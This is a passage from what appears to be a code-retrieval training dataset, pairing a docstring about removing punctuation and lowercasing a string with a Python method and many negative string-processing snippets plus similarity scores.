not in my_map:\n my_map[word] = 1\n else:\n my_map[word] += 1\n\n return my_map", "def count_ngrams(self, corpus):\n \n self.unigramcounts = {} # might want to use defaultdict or Counter instead\n self.bigramcounts = {} \n self.trigramcounts = {} \n\n self.total = 2\n ##Your code here\n\n for sentence in corpus:\n temp_1 = get_ngrams(sentence,1)\n temp_2 = get_ngrams(sentence,2)\n temp_3 = get_ngrams(sentence,3)\n for i in range(len(temp_1)):\n if temp_1[i] in self.unigramcounts:\n self.unigramcounts[temp_1[i]] += 1\n else:\n self.unigramcounts[temp_1[i]] = 1\n self.total += 1\n\n for i in range(len(temp_2)):\n if temp_2[i] in self.bigramcounts:\n self.bigramcounts[temp_2[i]] += 1\n else:\n self.bigramcounts[temp_2[i]] = 1\n\n for i in range(len(temp_3)):\n if temp_3[i] in self.trigramcounts:\n self.trigramcounts[temp_3[i]] += 1\n else:\n self.trigramcounts[temp_3[i]] = 1\n return" ]
[ "0.7311082", "0.7273472", "0.719954", "0.7128146", "0.7035594", "0.6915477", "0.6807058", "0.67538345", "0.6753401", "0.6745445", "0.6740302", "0.67023945", "0.66921777", "0.6651242", "0.66414374", "0.6606957", "0.65921336", "0.6576811", "0.6570049", "0.6568746", "0.6565606", "0.6547006", "0.65094465", "0.65053964", "0.64608496", "0.6456815", "0.6447891", "0.64143354", "0.64090806", "0.64082813", "0.637803", "0.6373971", "0.63698965", "0.6359882", "0.6357308", "0.63448954", "0.6342788", "0.632319", "0.63086337", "0.6302139", "0.6298491", "0.6289316", "0.62749976", "0.626853", "0.62635577", "0.6241119", "0.62359005", "0.62276393", "0.6220667", "0.6216767", "0.620451", "0.6198752", "0.6194574", "0.617114", "0.61709166", "0.616778", "0.61649406", "0.61609346", "0.61588484", "0.61515045", "0.6143183", "0.61417973", "0.6137639", "0.61289096", "0.6103122", "0.6098141", "0.6093311", "0.6091146", "0.60756856", "0.6052952", "0.6052807", "0.60483694", "0.60470897", "0.60444254", "0.60307205", "0.6030662", "0.6021088", "0.60209864", "0.60193795", "0.60132617", "0.60119605", "0.6004764", "0.59987396", "0.59970605", "0.59941936", "0.59919745", "0.5988491", "0.5982034", "0.5981585", "0.5980841", "0.59787595", "0.59772086", "0.5959279", "0.5956923", "0.5954171", "0.5952946", "0.59510326", "0.59499705", "0.5948788", "0.59463394" ]
0.6100995
65
takes string s and remove all punctions and changes all caps to low
def cleanString(self, s): s = s.lower() for x in s: if x in punctuation: s = s.replace(x, '') return s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cap_case_str(s):\n return re.sub(r'(?:[_\\-\\s]+|^)(.)', lambda m: m.group(1).upper(), s)", "def change_title(s):\n\ts = re.sub(r\"[A-Za-z]+('[A-Za-z]+)?\",\n lambda mo: mo.group(0)[0].upper() +\n mo.group(0)[1:].lower(),s)\n\ts = s.split(\" \")\n\tfor i in range(len(s)):\n\t\tif (s[i] in \"Ii Iii Iv Vi Vii Viii Ix Ii: Iii: Iv: Vi: Vii: Viii: Ix:\"):\n\t\t\ts[i] = s[i].upper()\n\treturn \" \".join(s)", "def preprocess(self, s):\n stripped = re.sub(\"[^\\w\\s]\", \"\", s)\n stripped = re.sub(\"_\", \"\", stripped)\n\n stripped = re.sub(\"\\s+\", \" \", stripped)\n\n stripped = stripped.strip()\n\n return stripped.lower()", "def uncamel(s):\n for pat in uncamel_patterns:\n s = pat.sub(r'\\1_\\2', s)\n return s.lower()", "def uncamel(s):\n for pat in uncamel_patterns:\n s = pat.sub(r'\\1_\\2', s)\n return s.lower()", "def normalize(s):\n s = replace_whitespace(s)\n s = remove_dashes(s)\n s = s.lower()\n return s", "def ReplaceCapitals(string):\n\n newString = \"\"\n for char in string:\n if char.isupper():\n newString += \"_%s\"%char.lower()\n else:\n newString += char\n\n return newString", "def spinalcase(string):\n\n return re.sub(r\"_\", \"-\", snakecase(string))", "def process(self, s):\n # modified for project...\n return s.upper()", "def standardize(text):\n # FIXME regex restricts us to only ascii\n # FIXME move regex compilation outside\n p = re.compile('[^a-zA-Z]')\n retval = p.sub('', text)\n retval = retval.lower()\n return retval", "def lowercase(s):\n ls = \"\"\n for c in s:\n if c in string.ascii_uppercase:\n ls = ls + string.ascii_lowercase[string.ascii_uppercase.index(c)]\n else:\n ls = ls + c\n return ls", "def camel_to_spaces(s):\n subbed = _underscorer1.sub(r'\\1 \\2', s)\n return _underscorer2.sub(r'\\1 \\2', subbed).lower()", "def normalize(s):\n s = s.lower().replace(u' ', u'-')\n s = u''.join([c for c in s if c in string.letters + string.digits])\n return s", "def proper_title_case(s):\n nocaps = [\"the\"] # This needs to be extended.", "def to_clean_str(s: str) -> str:\n return re.sub(\"[^a-zA-Z0-9]\", \"\", s).lower()", "def capify(text):\n return text[0].upper() + text[1:]", "def uppersnakecase(string):\n\n return uppercase(snakecase(string))", "def clean_name(s):\n return re.sub('[\\W_]+', '', s).lower()", "def invert_capitalization(word):\n if word.islower():\n return word.upper()\n else:\n return word.lower()", "def remove_all_caps(text):\n return re.sub(r\"(\\b(?:[A-Z]+[a-z]?[A-Z]*|[A-Z]*[a-z]?[A-Z]+)\\b(?:\\s+(?:[A-Z]+[a-z]?[A-Z]*|[A-Z]*[a-z]?[A-Z]+)\\b)*)\",\n ' ', text)", "def clean_data(s):\n s = s.strip()\n s = s.lower()\n return s", "def _nice_case(line):\n line_lower = line.lower()\n s = \"\"\n i = 0\n nextCap = 1\n while i < len(line_lower):\n c = line_lower[i]\n if c >= \"a\" and c <= \"z\" and nextCap:\n c = c.upper()\n nextCap = 0\n elif c in \" .,;:\\t-_\":\n nextCap = 1\n s += c\n i += 1\n return s", "def capitalize1(s):\n return s[:1].upper() + s[1:]", "def sanitize(string):\n retval = string.lower()\n retval = re.sub(r\"[^\\w\\s]\", '', retval)\n retval = re.sub(r\"\\s+\", '_', retval)\n return retval", "def pascalcase(string):\n\n return capitalcase(camelcase(string))", "def to_camelcase(s):\n words = re.split(\"[^a-zA-Z0-9]+\", s)\n return \"\".join(\n w.lower() if i is 0 else w.title() for i, w in enumerate(words))", "def pascal_case(st) -> str:\n if st.find('-') != -1 or st.find('_') != -1:\n st = ''.join(a.capitalize() for a in re.split('-|_', st))\n return st[:1].upper() + st[1: len(st)]", "def camel(s):\n return s[0].upper() + s[1:]", "def fixString(string):\n string = re.sub(r\"[^A-Z-]\", \"\", string)\n return string", "def title_case(s):\n if not s:\n return None\n\n s = s.lower()\n parts = s.split(' ')\n lower_case = (\n 'a', 'an', 'and', 'as', 'at', 'by', 'for', 'in', 'of', 'on', 'or',\n 'the', 'to', 'with'\n )\n\n parts[0] = parts[0].title()\n parts = map(\n lambda part: part.title() if part not in lower_case else part,\n parts\n )\n\n return ' '.join(parts)", "def cap_first(word):\n return word[0].upper() + word[1:]", "def filter_lowercase(self, string):\n newstring = string.lower()\n return newstring", "def preprocess_titles(s: str) -> str:\r\n s = RE_SYMBOLS.sub(r'', s)\r\n s = s.translate(str.maketrans('', '', string.punctuation))\r\n s = re.sub('\\s+', ' ', s)\r\n s = s.lower()\r\n return unicodedata.normalize('NFKC', s)", "def __process_word(self, word):\n output = ''\n capitals = self.__capital_positions(word)\n c_index = 0\n\n for c in word:\n if c_index in capitals:\n output += c.upper()\n else:\n output += c.lower()\n\n c_index += 1\n\n return output", "def sanitize(str):\n res = str.lower()\n return res.replace(' ', '-')", "def no_caps_and_ponctuation(text):\n return re.sub(r'[^\\w\\s]', '', text).lower()", "def make_name2(u):\n\treturn re.sub(r'\\s+', '', u).lower()", "def CamelCaseToOutputFriendly(string):\n return re.sub('([A-Z]+)', r' \\1', string).strip().lower()", "def lower_without_diacritics(s):\n return filter(lambda u: not combining(u), normalize('NFKD', s)).lower()", "def snake_to_pascal(string):\n return string[0].upper() + re.sub('_([a-z])', lambda match: match.group(1).upper(), string[1:])", "def normalise(string):\n return re.sub(' +', ' ', string).lower()", "def not_capitalized(): # noqa: D416", "def upper(string):\n new_string = '' # Empty string to append to\n for char in string: # Itterate over each character in user's string\n if char.isalpha() and not char.isupper(): # If the character is an alphabet and not already uppercase\n char = (chr(ord(char) - 32)) # Subtract 32 from it's ASCI value to get the uppercase alphabet\n if char.isalnum() or char == ' ': # Preserve spaces, and ignore special characters such as punctuation etc.\n new_string += char # Append capitalized characters and spaces to the new string\n return new_string # return the capitalized string", "def normalize(string):\n\n normalized = []\n\n for ch in string:\n if ch.isalpha():\n normalized.append(ch.lower())\n\n target = \"\".join(normalized)\n return target", "def preprocess(string):\n cleaned = regex.sub(\" \", string)\n return cleaned.lower()", "def tr_upper_to_lower(text):\n out = []\n for ch in text:\n if ch in tr_upper_to_lower_dict:\n out.append(tr_upper_to_lower_dict[ch])\n else:\n out.append(ch.lower())\n \n return \"\".join(out)", "def _case_insensitive(s: str):\n return s.lower()", "def convert(name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()", "def ucwords(string):\n erg=[ item.capitalize() for item in string.split( ' ' ) ]\n return ' '.join( erg )", "def correctCasing(words):\n strings = words.split(' ')\n strings = [s[0].upper()+s[1:].lower() for s in strings if s]\n return ' '.join(strings)", "def snakecase(string):\n\n string = re.sub(r\"[\\-\\.\\s]\", '_', str(string))\n if not string:\n return string\n return lowercase(string[0]) + re.sub(r\"[A-Z]\", lambda matched: '_' + lowercase(matched.group(0)), string[1:])", "def normalize(name):\n name = name.lower()\n name = name.replace('-', '')\n name = name.replace(' ', '')\n return name", "def normalize_case(text):\n text = str(text)\n return text.lower()", "def slugify(s):\n\treturn re.sub('[!@#$%^&*()\\\\\\\\/:.\"\"]+', '', s).replace(' ', '-').replace('--', '-').lower()", "def slugify(s):\n s = reg_nonchar.sub('-', s).lower()\n s = reg_dashes.sub('-', s)\n s = reg_outer_dashes.sub('', s)\n return s", "def first_lower(self, s):\n if len(s) == 0:\n return s\n else:\n return s[0].lower() + s[1:]", "def test_capitalize(self):\n self.assertEqual(\n minerals_extras.capitalize('mohs scale hardness'),\n 'Mohs Scale Hardness')", "def str(s):\n if s is None:\n l = \"\"\n else:\n l = str(s).lower()\n\n return l", "def string_to_snake_case(string:str) -> str:\n result_snake_case = str()\n for symb in string:\n if symb.isupper():\n symb = '_' + symb.lower()\n result_snake_case += symb\n return result_snake_case", "def toChar(s):\n s = s.lower()\n ans = \"\"\n for c in s:\n if c in \"abcdefghijklmnopqrstuvwxyz\":\n ans+=c\n return ans", "def to_camel_case(s):\n if s[:1].isupper() and '_' not in s:\n return s\n else:\n return snake_case_to_camel_case(s)", "def make_systematic_name(name):\n return \" \".join(re.findall(r\"([A-Z]+[a-z]*)\", name)).capitalize()", "def convert_to_snake_case(string: str) -> str:\n\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', string)\n draft = re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n return draft.replace('__', '_')", "def titleize(phrase):\n nl = phrase.split(' ')\n o=[]\n for i in nl:\n o.append(i[0].upper()+i[1:].lower())\n print(' '.join(o))", "def capitalcase(string):\n\n string = str(string)\n if not string:\n return string\n return uppercase(string[0]) + string[1:]", "def filter_words(st):\n\n filtered = \" \".join(st.capitalize().split())\n return filtered", "def scrub_string(str):\n return \"\".join(ch for ch in str if ch.isalpha() or ch.isdigit()).lower()", "def majuscule(string):\n\n res = \"\"\n toChange = True\n\n for letter in string:\n value_letter = ord(letter)\n isLetter = 65 <= value_letter and value_letter <= 92 or 96 <= value_letter and value_letter <= 122\n if isLetter:\n if toChange:\n res += chr(ord(letter) - 32)\n else:\n res += letter\n toChange = not toChange\n else:\n res += letter\n\n print(res)", "def fix_string_case(text):\n fixed = []\n for i in text:\n if is_case_sensitive(i):\n fixed.append(i)\n else:\n fixed.append(i.lower())\n return ''.join(fixed)", "def asciify(s):\n # http://en.wikipedia.org/wiki/Unicode_equivalence#Normal_forms\n return unicodedata.normalize('NFKD', s).encode('ascii', 'ignore')", "def _camel_killer(attr):\n try:\n attr = str(attr)\n except UnicodeEncodeError:\n attr = attr.encode('utf-8', 'ignore')\n s1 = _first_cap_re.sub('\\\\1_\\\\2', attr)\n s2 = _all_cap_re.sub('\\\\1_\\\\2', s1)\n return re.sub('_+', '_', s2.casefold() if hasattr(s2, 'casefold') else s2.lower())", "def normalize(s):\r\n def remove_articles(text):\r\n return re.sub(r'\\b(a|an|the)\\b', ' ', text)\r\n\r\n def white_space_fix(text):\r\n return ' '.join(text.split())\r\n\r\n def remove_punc(text):\r\n exclude = set(string.punctuation)\r\n return ''.join(ch for ch in text if ch not in exclude)\r\n\r\n def lower(text):\r\n return text.lower()\r\n\r\n return white_space_fix(remove_articles(remove_punc(lower(s))))", "def normalize(s):\r\n def remove_articles(text):\r\n return re.sub(r'\\b(a|an|the)\\b', ' ', text)\r\n\r\n def white_space_fix(text):\r\n return ' '.join(text.split())\r\n\r\n def remove_punc(text):\r\n exclude = set(string.punctuation)\r\n return ''.join(ch for ch in text if ch not in exclude)\r\n\r\n def lower(text):\r\n return text.lower()\r\n\r\n return white_space_fix(remove_articles(remove_punc(lower(s))))", "def capitalizestring(data):\n ss_list = capitalize_rex.split(data)\n ss = ''\n count = 0\n for phrase in ss_list:\n check = phrase.lstrip()\n\n # keep phrase's capitalization the same\n if check.find('{') == 0:\n ss += cap_rex.sub(r'\\1', phrase)\n else:\n # first word --> capitalize first letter (after spaces)\n if count == 0:\n ss += phrase.capitalize()\n else:\n ss += phrase.lower()\n count += 1\n return ss", "def rev_dash_snake_case(string_to_convert):\n return ''.join(i.capitalize() for i in string_to_convert.split('-'))", "def normalize_string(self, my_string):\n return (\n unicodedata.normalize(\"NFKD\", my_string)\n .encode(\"ASCII\", \"ignore\")\n .decode()\n .replace(\" \", \"_\")\n .lower()\n )", "def LCase(text):\n return text.lower()", "def role_name_from(s: str) -> str:\n return s.lower().replace(\" \", \"-\")", "def toPascelCase(name, perserveSep = False):\n\n if name == None or name.isspace():\n return \"\"\n\n name = toCamelCase(name, perserveSep)\n rslt = name[0].upper()\n\n i = 1\n while i < len(name):\n rslt += name[i]\n i += 1\n \n return rslt", "def word_capital(text):\n if text and len(text) > 0:\n return ' '.join([s[0].upper() + s[1:] for s in text.split(' ') if len(s) > 0])\n else:\n return text", "def UCase(text):\n return text.upper()", "def get_initials(name, force_upper=True):\r\n if force_upper:\r\n return name[0:1].upper()\r\n return name[0:1]", "def python_safe_name(s):\n no_punctuation = re.compile(r'[\\W_]', re.MULTILINE).sub\n s = s.lower()\n s = no_punctuation(' ', s)\n s = '_'.join(s.split())\n if py2 and isinstance(s, unicode):\n s = s.encode('ascii', 'ignore')\n return s", "def namecase(name):\n return re.sub(r\"[A-Za-z]+('[A-Za-z]+])?\",\n lambda mo: _namecase.get(mo.group(0).lower(),\n mo.group(0).title()),\n name)", "def capitalizeFirst(word):\n return word[0].upper() + word[1:]", "def clean_str(string):\n return string.strip().lower()", "def normalize_alphabet(sentence):\n marks = (\n ('á', 'a'), ('â', 'a'), ('ã', 'a'), ('à', 'a'),\n ('Á', 'A'), ('Â', 'A'), ('Ã', 'A'), ('À', 'A'),\n ('é', 'e'), ('ê', 'e'),\n ('É', 'E'), ('Ê', 'E'),\n ('í', 'i'),\n ('Í', 'I'),\n ('ó', 'o'), ('ô', 'o'), ('õ', 'o'),\n ('Ó', 'O'), ('Ô', 'O'), ('Õ', 'O'),\n ('ú', 'u'),\n ('Ú', 'U'),\n ('ç', 'c'),\n ('Ç', 'C'),\n )\n for mark in marks:\n sentence = re.sub(mark[0], mark[1], sentence)\n sentence = sentence.lower()\n sentence = re.sub(r'[?|\\.|!|:|,|;]', '', sentence)\n sentence = re.sub(r'^\\w+\\t+[^\\w]', '', sentence) # Drop tags (?!?)\n return str(sentence)", "def get_python_name(cls, name):\n first_cap_re = re.compile(\"(.)([A-Z](?!s([A-Z])*)[a-z]+)\")\n all_cap_re = re.compile(\"([a-z0-9])([A-Z])\")\n\n s1 = first_cap_re.sub(r\"\\1_\\2\", Utils._clean_name(name))\n return all_cap_re.sub(r\"\\1_\\2\", s1).lower()", "def fix_title(title):\n words = re.findall('[A-Z][^A-Z]*', title[0])\n final_str = \"\"\n for word in words:\n final_str += word + \" \"\n return final_str.strip()", "def checkCapitalizeName(self, stringToCheck):\n #https://stackoverflow.com/questions/15947614/regex-to-match-capitalized-words-with-a-single-space-between-them\n pattern = \"^[A-Z]\\w{1,16}( [A-Z]\\w{1,16})*$\"\n return True if re.search(pattern, stringToCheck) else None", "def get_casing(word):\n if len(word) == 0:\n return \"other\"\n elif word.isdigit(): # Is a digit\n return \"numeric\"\n elif word.islower(): # All lower case\n return \"allLower\"\n elif word.isupper(): # All upper case\n return \"allUpper\"\n # is a title, initial char upper, then all lower\n elif word[0].isupper():\n return \"initialUpper\"\n\n return \"other\"", "def format_camel(text):\r\n\toutput = \"\"\r\n\tfor i,w in enumerate(text.split(\" \")):\r\n\t\tif i > 0:\r\n\t\t\toutput += w[0].upper() + w[1:]\r\n\t\telse:\r\n\t\t\toutput += w\r\n\treturn output", "def normalize_word(word):\n\n return word.lower()", "def adjust_case(input_str):\n \"\"\"and the second block is lowercase. e.g. krpkq to KRPkq\"\"\"\n lower = input_str.lower()\n second_k = lower.find(\"k\", 1)\n # print(f\"second k at {second_k}\")\n out1 = lower[:second_k].upper()\n out2 = lower[second_k:]\n output_str = out1+out2\n if second_k == -1:\n output_str = \"fail\"\n return output_str", "def f03_04_extractCap(s):\n return re.findall('[A-Z]\\w*', s)", "def normalize_alef_hsb(s):\n\n return _ALEF_NORMALIZE_HSB_RE.sub(u'A', s)", "def normalize_text(s):\n import string, re\n\n def remove_articles(text):\n regex = re.compile(r\"\\b(a|an|the)\\b\", re.UNICODE)\n return re.sub(regex, \" \", text)\n\n def white_space_fix(text):\n return \" \".join(text.split())\n\n def remove_punc(text):\n exclude = set(string.punctuation)\n return \"\".join(ch for ch in text if ch not in exclude)\n\n def lower(text):\n return text.lower()\n\n return white_space_fix(remove_articles(remove_punc(lower(s))))", "def make_alphabetic(text):\n text = re.sub(r'[^A-Za-z\\s]', '', text)\n return text.lower()", "def name_to_goodreads(name):\n name = to_ascii(name.title())\n for char in CHARS:\n name = name.replace(*char)\n return name", "def case_i(string: str) -> str:\n return \"\".join(\"[\" + c.upper() + c.lower() + \"]\"\n if c.isalpha() else c for c in re.escape(string))", "def to_snake(string):\n\n return re.sub(r'(?<!^)(?=[A-Z])', '_', string).lower()" ]
[ "0.7568107", "0.7516122", "0.74232686", "0.7276909", "0.7276909", "0.7258973", "0.72260845", "0.7212958", "0.71921355", "0.71753323", "0.71484214", "0.70824426", "0.7060332", "0.70213103", "0.7021105", "0.7014167", "0.7006824", "0.6992608", "0.6962558", "0.6950061", "0.69467145", "0.6933975", "0.69203514", "0.68993384", "0.6876459", "0.68682534", "0.6862074", "0.68530923", "0.68508434", "0.68382794", "0.68125856", "0.67720336", "0.6763141", "0.6748474", "0.6715753", "0.67104846", "0.6689849", "0.66861594", "0.6685815", "0.6682977", "0.6673677", "0.6669629", "0.66493744", "0.6611579", "0.6610221", "0.6608825", "0.6604498", "0.6588293", "0.6578108", "0.65758705", "0.6566699", "0.65632606", "0.6559855", "0.65545285", "0.65500647", "0.65410405", "0.6538758", "0.6516342", "0.6505073", "0.6501592", "0.649915", "0.64895236", "0.64749926", "0.64683676", "0.64660686", "0.64615", "0.6450465", "0.6448203", "0.64466774", "0.6438728", "0.6434805", "0.6433802", "0.6433802", "0.642321", "0.64196676", "0.6419631", "0.6418346", "0.6417701", "0.6417671", "0.64154154", "0.64126873", "0.64050215", "0.63992435", "0.63924336", "0.63854873", "0.63779026", "0.63768375", "0.6367379", "0.635824", "0.635407", "0.6349516", "0.6347304", "0.6340972", "0.63386905", "0.63386774", "0.6333484", "0.6332744", "0.6327753", "0.63256973", "0.6319301", "0.6319126" ]
0.0
-1